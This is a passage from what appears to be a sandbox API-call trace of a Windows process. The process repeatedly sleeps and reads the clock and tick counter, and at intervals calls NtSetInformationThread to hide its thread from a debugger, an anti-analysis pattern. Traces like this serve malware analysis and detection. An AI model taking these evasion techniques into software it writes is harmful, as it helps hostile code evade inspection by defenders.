lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x266)) [0198.783] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0198.784] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0198.786] GetCurrentThread () returned 0xfffffffe [0198.786] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0198.788] GetTickCount () returned 0x1d72b32 [0198.788] Sleep (dwMilliseconds=0x3e8) [0198.790] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x26d)) [0198.790] GetTickCount () returned 0x1d72f29 [0198.790] Sleep (dwMilliseconds=0x3e8) [0198.792] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x26f)) [0198.792] GetTickCount () returned 0x1d73310 [0198.792] Sleep (dwMilliseconds=0x3e8) [0198.793] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x270)) [0198.794] GetTickCount () returned 0x1d736f7 [0198.794] Sleep (dwMilliseconds=0x3e8) [0198.802] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x279)) [0198.802] GetTickCount () returned 0x1d73ade [0198.802] Sleep (dwMilliseconds=0x3e8) [0198.805] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x27c)) [0198.805] GetTickCount () returned 0x1d73ed4 [0198.805] Sleep (dwMilliseconds=0x3e8) [0198.807] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x27e)) [0198.808] GetTickCount () returned 0x1d742bb [0198.808] Sleep (dwMilliseconds=0x3e8) [0198.809] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x280)) [0198.809] GetTickCount () returned 0x1d746a2 [0198.809] Sleep (dwMilliseconds=0x3e8) [0198.811] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x282)) [0198.811] GetTickCount () returned 0x1d74a89 [0198.811] Sleep (dwMilliseconds=0x3e8) [0198.812] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x283)) [0198.812] GetTickCount () returned 0x1d74e70 [0198.812] Sleep (dwMilliseconds=0x3e8) [0198.814] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x285)) [0198.819] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0198.820] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0198.822] GetCurrentThread () returned 0xfffffffe [0198.822] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0198.822] GetTickCount () returned 0x1d75267 [0198.822] Sleep (dwMilliseconds=0x3e8) [0198.824] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x28f)) [0198.824] GetTickCount () returned 0x1d7564e [0198.824] Sleep (dwMilliseconds=0x3e8) [0198.826] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x291)) [0198.826] GetTickCount () returned 0x1d75a35 [0198.826] Sleep (dwMilliseconds=0x3e8) [0198.830] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x295)) [0198.830] GetTickCount () returned 0x1d75e1c [0198.830] Sleep (dwMilliseconds=0x3e8) [0198.833] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x298)) [0198.834] GetTickCount () returned 0x1d76203 [0198.834] Sleep (dwMilliseconds=0x3e8) [0198.836] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x29b)) [0198.836] GetTickCount () returned 0x1d765f9 [0198.836] Sleep (dwMilliseconds=0x3e8) [0198.839] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x29e)) [0198.839] GetTickCount () returned 0x1d769e0 [0198.839] Sleep (dwMilliseconds=0x3e8) [0198.843] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x2a2)) [0198.843] GetTickCount () returned 0x1d76dc7 [0198.843] Sleep (dwMilliseconds=0x3e8) [0198.846] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x2a6)) [0198.847] GetTickCount () returned 0x1d771ae [0198.847] Sleep (dwMilliseconds=0x3e8) [0198.850] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x2a9)) [0198.850] GetTickCount () returned 0x1d77595 [0198.850] Sleep (dwMilliseconds=0x3e8) [0198.852] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x2ab)) [0198.852] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0198.853] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0198.853] GetCurrentThread () returned 0xfffffffe [0198.853] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0198.854] GetTickCount () returned 0x1d7798c [0198.854] Sleep (dwMilliseconds=0x3e8) [0198.860] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x2b3)) [0198.860] GetTickCount () returned 0x1d77d73 [0198.860] Sleep (dwMilliseconds=0x3e8) [0198.862] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x2b5)) [0198.862] GetTickCount () returned 0x1d7815a [0198.863] Sleep (dwMilliseconds=0x3e8) [0198.866] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x2b9)) [0198.866] GetTickCount () returned 0x1d78541 [0198.867] Sleep (dwMilliseconds=0x3e8) [0198.873] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x2c0)) [0198.873] GetTickCount () returned 0x1d78938 [0198.873] Sleep (dwMilliseconds=0x3e8) [0198.874] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x2c1)) [0198.874] GetTickCount () returned 0x1d78d1f [0198.875] Sleep (dwMilliseconds=0x3e8) [0198.876] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x2c3)) [0198.876] GetTickCount () returned 0x1d79106 [0198.877] Sleep (dwMilliseconds=0x3e8) [0198.882] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x2c9)) [0198.882] GetTickCount () returned 0x1d794ed [0198.882] Sleep (dwMilliseconds=0x3e8) [0198.883] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x2ca)) [0198.883] GetTickCount () returned 0x1d798e3 [0198.884] Sleep (dwMilliseconds=0x3e8) [0198.885] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x2cc)) [0198.885] GetTickCount () returned 0x1d79cca [0198.885] Sleep (dwMilliseconds=0x3e8) [0198.887] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x2ce)) [0198.889] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0198.889] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0198.890] GetCurrentThread () returned 0xfffffffe [0198.890] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0198.890] GetTickCount () returned 0x1d7a0b1 [0198.890] Sleep (dwMilliseconds=0x3e8) [0198.892] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x2d3)) [0198.892] GetTickCount () returned 0x1d7a498 [0198.892] Sleep (dwMilliseconds=0x3e8) [0198.894] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x2d5)) [0198.894] GetTickCount () returned 0x1d7a87f [0198.894] Sleep (dwMilliseconds=0x3e8) [0198.896] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x2d7)) [0198.896] GetTickCount () returned 0x1d7ac66 [0198.901] Sleep (dwMilliseconds=0x3e8) [0198.904] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x2df)) [0198.905] GetTickCount () returned 0x1d7b05d [0198.905] Sleep (dwMilliseconds=0x3e8) [0198.907] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x2e2)) [0198.907] GetTickCount () returned 0x1d7b444 [0198.907] Sleep (dwMilliseconds=0x3e8) [0198.912] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x2e7)) [0198.912] GetTickCount () returned 0x1d7b82b [0198.912] Sleep (dwMilliseconds=0x3e8) [0198.914] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x2e9)) [0198.914] GetTickCount () returned 0x1d7bc21 [0198.914] Sleep (dwMilliseconds=0x3e8) [0198.917] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x2ec)) [0198.917] GetTickCount () returned 0x1d7c008 [0198.917] Sleep (dwMilliseconds=0x3e8) [0198.919] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x2ee)) [0198.919] GetTickCount () returned 0x1d7c3ef [0198.920] Sleep (dwMilliseconds=0x3e8) [0198.921] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x2f0)) [0198.922] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0198.922] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0198.923] GetCurrentThread () returned 0xfffffffe [0198.923] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0198.923] GetTickCount () returned 0x1d7c7d6 [0198.923] Sleep (dwMilliseconds=0x3e8) [0198.927] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x2f6)) [0198.927] GetTickCount () returned 0x1d7cbbd [0198.929] Sleep (dwMilliseconds=0x3e8) [0198.930] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x2f9)) [0198.930] GetTickCount () returned 0x1d7cfb4 [0198.930] Sleep (dwMilliseconds=0x3e8) [0198.932] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x2fb)) [0198.932] GetTickCount () returned 0x1d7d39b [0198.932] Sleep (dwMilliseconds=0x3e8) [0198.935] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x2fe)) [0198.939] GetTickCount () returned 0x1d7d782 [0198.939] Sleep (dwMilliseconds=0x3e8) [0198.942] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x305)) [0198.942] GetTickCount () returned 0x1d7db69 [0198.942] Sleep (dwMilliseconds=0x3e8) [0198.944] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x307)) [0198.944] GetTickCount () returned 0x1d7df50 [0198.944] Sleep (dwMilliseconds=0x3e8) [0198.946] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x309)) [0198.946] GetTickCount () returned 0x1d7e347 [0198.946] Sleep (dwMilliseconds=0x3e8) [0198.951] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x30e)) [0198.951] GetTickCount () returned 0x1d7e72e [0198.951] Sleep (dwMilliseconds=0x3e8) [0198.953] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x311)) [0198.954] GetTickCount () returned 0x1d7eb15 [0198.954] Sleep (dwMilliseconds=0x3e8) [0198.955] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x312)) [0198.957] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0198.957] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0198.957] GetCurrentThread () returned 0xfffffffe [0198.957] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0198.960] GetTickCount () returned 0x1d7eefc [0198.961] Sleep (dwMilliseconds=0x3e8) [0198.962] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x319)) [0198.962] GetTickCount () returned 0x1d7f2f2 [0198.962] Sleep (dwMilliseconds=0x3e8) [0198.965] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x31c)) [0198.965] GetTickCount () returned 0x1d7f6d9 [0198.965] Sleep (dwMilliseconds=0x3e8) [0198.973] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x324)) [0198.973] GetTickCount () returned 0x1d7fac0 [0198.973] Sleep (dwMilliseconds=0x3e8) [0198.975] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x326)) [0198.975] GetTickCount () returned 0x1d7fea7 [0198.975] Sleep (dwMilliseconds=0x3e8) [0198.977] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x328)) [0198.977] GetTickCount () returned 0x1d8029e [0198.977] Sleep (dwMilliseconds=0x3e8) [0198.983] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x32e)) [0198.983] GetTickCount () returned 0x1d80685 [0198.983] Sleep (dwMilliseconds=0x3e8) [0198.985] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x330)) [0198.985] GetTickCount () returned 0x1d80a6c [0198.985] Sleep (dwMilliseconds=0x3e8) [0198.987] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x332)) [0198.987] GetTickCount () returned 0x1d80e53 [0198.989] Sleep (dwMilliseconds=0x3e8) [0198.991] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x336)) [0198.991] GetTickCount () returned 0x1d8123a [0198.991] Sleep (dwMilliseconds=0x3e8) [0198.992] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x337)) [0198.994] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0198.994] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0198.994] GetCurrentThread () returned 0xfffffffe [0198.994] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0198.995] GetTickCount () returned 0x1d81630 [0198.995] Sleep (dwMilliseconds=0x3e8) [0198.996] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x33c)) [0198.997] GetTickCount () returned 0x1d81a17 [0198.997] Sleep (dwMilliseconds=0x3e8) [0199.002] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x341)) [0199.002] GetTickCount () returned 0x1d81dfe [0199.002] Sleep (dwMilliseconds=0x3e8) [0199.005] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x344)) [0199.005] GetTickCount () returned 0x1d821e5 [0199.005] Sleep (dwMilliseconds=0x3e8) [0199.007] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x346)) [0199.007] GetTickCount () returned 0x1d825cc [0199.007] Sleep (dwMilliseconds=0x3e8) [0199.012] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x34b)) [0199.012] GetTickCount () returned 0x1d829c3 [0199.012] Sleep (dwMilliseconds=0x3e8) [0199.013] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x34c)) [0199.014] GetTickCount () returned 0x1d82daa [0199.014] Sleep (dwMilliseconds=0x3e8) [0199.015] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x34f)) [0199.016] GetTickCount () returned 0x1d83191 [0199.016] Sleep (dwMilliseconds=0x3e8) [0199.018] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x351)) [0199.018] GetTickCount () returned 0x1d83578 [0199.018] Sleep (dwMilliseconds=0x3e8) [0199.023] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x356)) [0199.023] GetTickCount () returned 0x1d8396f [0199.023] Sleep (dwMilliseconds=0x3e8) [0199.024] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x357)) [0199.025] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0199.025] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0199.025] GetCurrentThread () returned 0xfffffffe [0199.026] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0199.026] GetTickCount () returned 0x1d83d56 [0199.026] Sleep (dwMilliseconds=0x3e8) [0199.030] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x35d)) [0199.030] GetTickCount () returned 0x1d8413d [0199.030] 